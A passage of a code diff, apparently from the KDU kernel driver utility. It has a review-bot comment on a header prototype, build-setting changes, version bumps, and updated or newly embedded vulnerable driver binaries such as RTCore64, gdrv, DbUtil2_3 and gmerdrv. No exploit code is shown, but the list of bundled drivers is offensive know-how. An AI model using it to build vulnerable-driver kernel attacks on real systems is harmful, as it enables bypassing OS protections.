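Review bot: The added NtFlushVirtualMemory declaration starts directly at `NTSTATUS` and omits the `NTSYSAPI` line that every other prototype in these hunks carries. That leaves it as the one declaration without the import specifier. It also spells the last parameter `struct _IO_STATUS_BLOCK* IoStatus`, where the header otherwise uses `PIO_STATUS_BLOCK` (see NtQueryDirectoryFileEx earlier in the diff). I would add `NTSYSAPI` above `NTSTATUS` and write `_Out_ PIO_STATUS_BLOCK IoStatus);`. If the struct tag is deliberate because the typedef is not yet declared at this point in the header, a short comment should say so.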
@@ -12762,7 +14015,8 @@ typedef enum _SYSDBG_COMMAND {
SysDbgClearUmBreakPid,
SysDbgGetUmAttachPid,
SysDbgClearUmAttachPid,
- SysDbgGetLiveKernelDump
+ SysDbgGetLiveKernelDump,
+ SysDbgKdPullRemoteFile
} SYSDBG_COMMAND, *PSYSDBG_COMMAND;
typedef struct _SYSDBG_VIRTUAL {
diff --git a/Source/Tanikaze/Tanikaze.vcxproj b/Source/Tanikaze/Tanikaze.vcxproj
index 4d63a01..1e6fe01 100644
--- a/Source/Tanikaze/Tanikaze.vcxproj
+++ b/Source/Tanikaze/Tanikaze.vcxproj
@@ -23,7 +23,7 @@
Win32Proj
{072f189a-cea9-4ca8-a0fa-1257a7524a8e}
Tanikaze
- 10.0
+ 10.0.19041.0
@@ -154,15 +154,13 @@
Windows
- true
- true
false
false
true
true
+
+
Default
- /NOCOFFGRPINFO %(AdditionalOptions)
- 6.0
@@ -174,12 +172,14 @@
+
+
diff --git a/Source/Tanikaze/Tanikaze.vcxproj.filters b/Source/Tanikaze/Tanikaze.vcxproj.filters
index 07ca248..9d85e4b 100644
--- a/Source/Tanikaze/Tanikaze.vcxproj.filters
+++ b/Source/Tanikaze/Tanikaze.vcxproj.filters
@@ -73,5 +73,11 @@
Resource Files
+
+ Resource Files
+
+
+ Resource Files
+
\ No newline at end of file
diff --git a/Source/Tanikaze/drv/ATSZIO64.bin b/Source/Tanikaze/drv/ATSZIO64.bin
index 5499d92..8795b8c 100644
Binary files a/Source/Tanikaze/drv/ATSZIO64.bin and b/Source/Tanikaze/drv/ATSZIO64.bin differ
diff --git a/Source/Tanikaze/drv/DbUtil2_3.bin b/Source/Tanikaze/drv/DbUtil2_3.bin
new file mode 100644
index 0000000..29bcdc2
Binary files /dev/null and b/Source/Tanikaze/drv/DbUtil2_3.bin differ
diff --git a/Source/Tanikaze/drv/DirectIo64.bin b/Source/Tanikaze/drv/DirectIo64.bin
index 2e3be2b..9e2ba41 100644
Binary files a/Source/Tanikaze/drv/DirectIo64.bin and b/Source/Tanikaze/drv/DirectIo64.bin differ
diff --git a/Source/Tanikaze/drv/EneIo64.bin b/Source/Tanikaze/drv/EneIo64.bin
index 94952f4..2c5e4a4 100644
Binary files a/Source/Tanikaze/drv/EneIo64.bin and b/Source/Tanikaze/drv/EneIo64.bin differ
diff --git a/Source/Tanikaze/drv/EneTechIo64.bin b/Source/Tanikaze/drv/EneTechIo64.bin
index 3af8c86..bf7a2e5 100644
Binary files a/Source/Tanikaze/drv/EneTechIo64.bin and b/Source/Tanikaze/drv/EneTechIo64.bin differ
diff --git a/Source/Tanikaze/drv/GLCKIO2.bin b/Source/Tanikaze/drv/GLCKIO2.bin
index 9599ef3..6f7737a 100644
Binary files a/Source/Tanikaze/drv/GLCKIO2.bin and b/Source/Tanikaze/drv/GLCKIO2.bin differ
diff --git a/Source/Tanikaze/drv/MsIo64.bin b/Source/Tanikaze/drv/MsIo64.bin
index a140382..b2d52cc 100644
Binary files a/Source/Tanikaze/drv/MsIo64.bin and b/Source/Tanikaze/drv/MsIo64.bin differ
diff --git a/Source/Tanikaze/drv/Phymemx64.bin b/Source/Tanikaze/drv/Phymemx64.bin
index 4a0ea9c..86a7b5e 100644
Binary files a/Source/Tanikaze/drv/Phymemx64.bin and b/Source/Tanikaze/drv/Phymemx64.bin differ
diff --git a/Source/Tanikaze/drv/RTCore64.bin b/Source/Tanikaze/drv/RTCore64.bin
index 7306f51..cc71440 100644
Binary files a/Source/Tanikaze/drv/RTCore64.bin and b/Source/Tanikaze/drv/RTCore64.bin differ
diff --git a/Source/Tanikaze/drv/WinRing0x64.bin b/Source/Tanikaze/drv/WinRing0x64.bin
index 0b365a9..2c057b8 100644
Binary files a/Source/Tanikaze/drv/WinRing0x64.bin and b/Source/Tanikaze/drv/WinRing0x64.bin differ
diff --git a/Source/Tanikaze/drv/asio2.bin b/Source/Tanikaze/drv/asio2.bin
index 6f669c2..d538096 100644
Binary files a/Source/Tanikaze/drv/asio2.bin and b/Source/Tanikaze/drv/asio2.bin differ
diff --git a/Source/Tanikaze/drv/ene2.bin b/Source/Tanikaze/drv/ene2.bin
index 8e0791d..85f42bd 100644
Binary files a/Source/Tanikaze/drv/ene2.bin and b/Source/Tanikaze/drv/ene2.bin differ
diff --git a/Source/Tanikaze/drv/gdrv.bin b/Source/Tanikaze/drv/gdrv.bin
index f18f6bd..706f383 100644
Binary files a/Source/Tanikaze/drv/gdrv.bin and b/Source/Tanikaze/drv/gdrv.bin differ
diff --git a/Source/Tanikaze/drv/gmerdrv.bin b/Source/Tanikaze/drv/gmerdrv.bin
new file mode 100644
index 0000000..e52090c
Binary files /dev/null and b/Source/Tanikaze/drv/gmerdrv.bin differ
diff --git a/Source/Tanikaze/drv/iQVM64.bin b/Source/Tanikaze/drv/iQVM64.bin
index 3c6bba1..0a3280f 100644
Binary files a/Source/Tanikaze/drv/iQVM64.bin and b/Source/Tanikaze/drv/iQVM64.bin differ
diff --git a/Source/Tanikaze/drv/lha.bin b/Source/Tanikaze/drv/lha.bin
index ecdf641..5ae126c 100644
Binary files a/Source/Tanikaze/drv/lha.bin and b/Source/Tanikaze/drv/lha.bin differ
diff --git a/Source/Tanikaze/drv/procexp.bin b/Source/Tanikaze/drv/procexp.bin
index 98168e0..f0be7f4 100644
Binary files a/Source/Tanikaze/drv/procexp.bin and b/Source/Tanikaze/drv/procexp.bin differ
diff --git a/Source/Tanikaze/drv/rtkio64.bin b/Source/Tanikaze/drv/rtkio64.bin
index f225c75..54e48e1 100644
Binary files a/Source/Tanikaze/drv/rtkio64.bin and b/Source/Tanikaze/drv/rtkio64.bin differ
diff --git a/Source/Tanikaze/resource.h b/Source/Tanikaze/resource.h
index 0293585..1970f50 100644
--- a/Source/Tanikaze/resource.h
+++ b/Source/Tanikaze/resource.h
@@ -18,12 +18,14 @@
#define IDR_LHA 116
#define IDR_ASIO2 117
#define IDR_DIRECTIO64 118
+#define IDR_GMERDRV 119
+#define IDR_DBUTIL23 120
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
-#define _APS_NEXT_RESOURCE_VALUE 119
+#define _APS_NEXT_RESOURCE_VALUE 121
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1001
#define _APS_NEXT_SYMED_VALUE 101
diff --git a/Source/Tanikaze/resource.rc b/Source/Tanikaze/resource.rc
index 326db0b..2658cc2 100644
--- a/Source/Tanikaze/resource.rc
+++ b/Source/Tanikaze/resource.rc
@@ -82,6 +82,10 @@ IDR_ASIO2 RCDATA "drv\\asio2.bin"
IDR_DIRECTIO64 RCDATA "drv\\DirectIo64.bin"
+IDR_GMERDRV RCDATA "drv\\gmerdrv.bin"
+
+IDR_DBUTIL23 RCDATA "drv\\DbUtil2_3.bin"
+
/////////////////////////////////////////////////////////////////////////////
//
@@ -89,8 +93,8 @@ IDR_DIRECTIO64 RCDATA "drv\\DirectIo64.bin"
//
VS_VERSION_INFO VERSIONINFO
- FILEVERSION 1,0,1,2105
- PRODUCTVERSION 1,0,1,2105
+ FILEVERSION 1,0,2,2201
+ PRODUCTVERSION 1,0,2,2201
FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
FILEFLAGS 0x1L
@@ -107,12 +111,12 @@ BEGIN
BEGIN
VALUE "CompanyName", "UG North"
VALUE "FileDescription", "Kernel Driver Utility Database"
- VALUE "FileVersion", "1.0.1.2105"
+ VALUE "FileVersion", "1.0.2.2201"
VALUE "InternalName", "Tanikaze.dll"
- VALUE "LegalCopyright", "Copyright (C) 2020 - 2021 KDU Project"
+ VALUE "LegalCopyright", "Copyright (C) 2020 - 2022 KDU Project"
VALUE "OriginalFilename", "Tanikaze.dll"
VALUE "ProductName", "KDU"
- VALUE "ProductVersion", "1.0.1.2105"
+ VALUE "ProductVersion", "1.0.2.2201"
END
END
BLOCK "VarFileInfo"
diff --git a/Source/Utils/PCOMP/PCOMP.cpp b/Source/Utils/PCOMP/PCOMP.cpp
index df61728..1e67288 100644
--- a/Source/Utils/PCOMP/PCOMP.cpp
+++ b/Source/Utils/PCOMP/PCOMP.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2021
+* (C) COPYRIGHT AUTHORS, 2020 - 2022
*
* TITLE: MAIN.CPP
*
-* VERSION: 1.00
+* VERSION: 1.01
*
-* DATE: 18 Apr 2021
+* DATE: 25 Jan 2022
*
* PCOMP - KDU's Provider Compressor.
*
@@ -221,6 +221,7 @@ VOID KDUCompressResource(
DELTA_INPUT d_in, d_target, s_op, t_op, g_op;
DELTA_OUTPUT d_out;
+ printf_s("[+] Compress key used 0x%lx\r\n", ulCompressKey);
printf_s("[+] Reading \"%wS\"\r\n", lpFileName);
fileBuffer = supReadFileToBuffer(lpFileName, &fileSize);
diff --git a/Source/Utils/PCOMP/PCOMP.vcxproj b/Source/Utils/PCOMP/PCOMP.vcxproj
index 65aad87..0e24c9f 100644
--- a/Source/Utils/PCOMP/PCOMP.vcxproj
+++ b/Source/Utils/PCOMP/PCOMP.vcxproj
@@ -15,7 +15,7 @@
Win32Proj
{24663340-6c3f-479e-94c0-c2a847b1665c}
PCOMP
- 10.0
+ 10.0.19041.0
@@ -75,6 +75,8 @@
true
MultiThreaded
%(AdditionalOptions)
+ true
+ false
Console